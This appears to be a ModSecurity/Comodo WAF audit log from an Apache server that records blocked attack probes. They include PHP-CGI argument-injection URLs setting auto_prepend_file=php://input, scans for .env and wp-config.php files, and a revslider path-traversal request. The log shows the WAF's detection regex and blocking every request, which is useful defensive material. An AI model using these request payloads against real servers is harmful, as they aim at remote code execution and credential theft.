"apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745894403418300 953 (- - -) Stopwatch2: 1745894403418300 953; combined=404, p1=349, p2=0, p3=0, p4=0, p5=55, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6b78169-Z-- --24c4103f-A-- [29/Apr/2025:10:00:06 +0700] aBBAtgW3ctMdWeqW3LO2SAAAAFQ 103.236.140.4 50350 103.236.140.4 8181 --24c4103f-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 183.220.231.212 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 183.220.231.212 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --24c4103f-C-- --24c4103f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24c4103f-E-- --24c4103f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745895606674194 17511 (- - -) Stopwatch2: 1745895606674194 17511; combined=27944, p1=546, p2=2585, p3=0, p4=0, p5=12426, sr=130, sw=0, l=0, gc=12387 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24c4103f-Z-- --b060e937-A-- [29/Apr/2025:10:28:24 +0700] aBBHWKmWspnM_fF1r_6BKAAAAAg 103.236.140.4 57040 103.236.140.4 8181 --b060e937-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.215.76.183 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.215.76.183 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --b060e937-C-- --b060e937-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b060e937-E-- --b060e937-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745897304154375 4549 (- - -) Stopwatch2: 1745897304154375 4549; combined=3167, p1=481, p2=2650, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b060e937-Z-- --e4eeeb78-A-- [29/Apr/2025:10:33:55 +0700] aBBIo8DCAfZpkPvVAPO12gAAAJQ 103.236.140.4 58412 103.236.140.4 8181 --e4eeeb78-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.162 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --e4eeeb78-C-- --e4eeeb78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4eeeb78-E-- --e4eeeb78-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745897635978294 4137 (- - -) Stopwatch2: 1745897635978294 4137; combined=2819, p1=472, p2=2317, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4eeeb78-Z-- --fd72db24-A-- [29/Apr/2025:14:14:30 +0700] aBB8VgW3ctMdWeqW3LPCMwAAAEM 103.236.140.4 54198 103.236.140.4 8181 --fd72db24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.34 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 Accept-Charset: utf-8 --fd72db24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd72db24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745910870185125 797 (- - -) Stopwatch2: 1745910870185125 797; combined=368, p1=336, p2=0, p3=0, p4=0, p5=32, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd72db24-Z-- --a0094867-A-- [29/Apr/2025:14:47:38 +0700] aBCEGqmWspnM_fF1r_6W7QAAABM 103.236.140.4 34038 103.236.140.4 8181 --a0094867-B-- GET /wp-config.phpold HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 82.165.86.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 82.165.86.35 X-Forwarded-Proto: http Connection: close Accept: */* --a0094867-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0094867-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745912858028460 846 (- - -) Stopwatch2: 1745912858028460 846; combined=336, p1=288, p2=0, p3=0, p4=0, p5=48, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0094867-Z-- --c5925c00-A-- [29/Apr/2025:14:47:39 +0700] aBCEG8DCAfZpkPvVAPPDuQAAAJE 103.236.140.4 34044 103.236.140.4 8181 --c5925c00-B-- GET /wp-config.php1 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 74.208.59.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 74.208.59.85 X-Forwarded-Proto: http Connection: close Accept: */* --c5925c00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5925c00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745912859212386 788 (- - -) Stopwatch2: 1745912859212386 788; combined=280, p1=241, p2=0, p3=0, p4=0, p5=38, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5925c00-Z-- --4b2e8379-A-- [29/Apr/2025:15:38:09 +0700] aBCP8VaiXvaz3oCHN0jBZgAAAMQ 103.236.140.4 45810 103.236.140.4 8181 --4b2e8379-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0; Le X620 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36 Accept-Charset: utf-8 --4b2e8379-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b2e8379-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745915889738823 774 (- - -) Stopwatch2: 1745915889738823 774; combined=319, p1=281, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b2e8379-Z-- --052dc72d-A-- [29/Apr/2025:16:21:39 +0700] aBCaI8DCAfZpkPvVAPPRwwAAAIE 103.236.140.4 43532 103.236.140.4 8181 --052dc72d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.106.105 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.106.105 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --052dc72d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --052dc72d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745918499063557 816 (- - -) Stopwatch2: 1745918499063557 816; combined=384, p1=346, p2=0, p3=0, p4=0, p5=38, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --052dc72d-Z-- --5880d241-A-- [29/Apr/2025:17:09:27 +0700] aBClV511ysLXBHLtLPV_zAAAAEI 103.236.140.4 42008 103.236.140.4 8181 --5880d241-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept-Charset: utf-8 --5880d241-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5880d241-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745921367769504 870 (- - -) Stopwatch2: 1745921367769504 870; combined=332, p1=297, p2=0, p3=0, p4=0, p5=35, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5880d241-Z-- --6c00622c-A-- [29/Apr/2025:18:01:21 +0700] aBCxgRmWB8ZGI9fN-VFUHgAAAI4 103.236.140.4 34518 103.236.140.4 8181 --6c00622c-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --6c00622c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c00622c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924481372882 1113 (- - -) Stopwatch2: 1745924481372882 1113; combined=392, p1=348, p2=0, p3=0, p4=0, p5=43, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c00622c-Z-- --c318f211-A-- [29/Apr/2025:18:01:22 +0700] aBCxgp11ysLXBHLtLPWdRQAAAFA 103.236.140.4 34520 103.236.140.4 8181 --c318f211-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --c318f211-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c318f211-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924482134512 761 (- - -) Stopwatch2: 1745924482134512 761; combined=263, p1=229, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c318f211-Z-- --40f1780f-A-- [29/Apr/2025:18:01:22 +0700] aBCxghmWB8ZGI9fN-VFUHwAAAI8 103.236.140.4 34526 103.236.140.4 8181 --40f1780f-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --40f1780f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40f1780f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924482494872 727 (- - -) Stopwatch2: 1745924482494872 727; combined=267, p1=231, p2=0, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40f1780f-Z-- --76b9624d-A-- [29/Apr/2025:18:01:22 +0700] aBCxgrM38gUEppT2vWM7ZgAAAMk 103.236.140.4 34528 103.236.140.4 8181 --76b9624d-B-- GET /laravel/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --76b9624d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76b9624d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924482850568 761 (- - -) Stopwatch2: 1745924482850568 761; combined=259, p1=226, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76b9624d-Z-- --4498cc47-A-- [29/Apr/2025:18:01:23 +0700] aBCxgyUYsqS7mE9-0zokGwAAAA4 103.236.140.4 34534 103.236.140.4 8181 --4498cc47-B-- GET /test/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --4498cc47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4498cc47-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924483530510 921 (- - -) Stopwatch2: 1745924483530510 921; combined=325, p1=293, p2=0, p3=0, p4=0, p5=32, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4498cc47-Z-- --2f26d507-A-- [29/Apr/2025:18:01:24 +0700] aBCxhCUYsqS7mE9-0zokHAAAAAk 103.236.140.4 34536 103.236.140.4 8181 --2f26d507-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --2f26d507-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f26d507-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924484363509 719 (- - -) Stopwatch2: 1745924484363509 719; combined=300, p1=268, p2=0, p3=0, p4=0, p5=32, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f26d507-Z-- --67b3dc2b-A-- [29/Apr/2025:18:01:25 +0700] aBCxhSUYsqS7mE9-0zokHgAAAAo 103.236.140.4 34542 103.236.140.4 8181 --67b3dc2b-B-- GET /vendor/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --67b3dc2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67b3dc2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924485134901 857 (- - -) Stopwatch2: 1745924485134901 857; combined=336, p1=299, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67b3dc2b-Z-- --c7558779-A-- [29/Apr/2025:18:01:25 +0700] aBCxhSUYsqS7mE9-0zokIAAAAAw 103.236.140.4 34548 103.236.140.4 8181 --c7558779-B-- GET /sites/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --c7558779-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7558779-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924485935288 919 (- - -) Stopwatch2: 1745924485935288 919; combined=357, p1=315, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for 